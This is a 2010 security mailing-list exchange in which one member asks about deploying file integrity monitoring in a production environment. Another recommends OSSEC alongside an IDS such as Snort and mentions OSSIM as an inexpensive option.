I would recommend OSSEC all the way, a joint effort with your IDS, such
as snort, helps greatly. To reduce the false incidents I agree with Ron
100% you need a means to compare events such as a file change and an
event on the network.
OSSEC is a great start though, if you want something inexpensive you can
look at OSSIM (http://www.alienvault.com/community.php?section=Home)
while the recently release is better the over all documentation is not
the greatest and it does bundle into the OS things that may not be
needed for your implementation, plan some time for tweaking and testing.
Keep us up to date as to what you guys choose and how it works out for you.
- Robert
(arch3angel)
On 3/12/2010 3:02 PM, Kennith Asher wrote:
Greetings gurus-
The company I work for is being pressed to deploy file integrity
monitoring tools in our production environment. I've not worked with
such tools in the past and am interested in your experiences.
I have concerns around noise levels, false positives, how to control
file integrity and still keep up with vendor updates (50 hour days
anyone?).
Anyone have any recommendations?
Thanks,
Ken
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
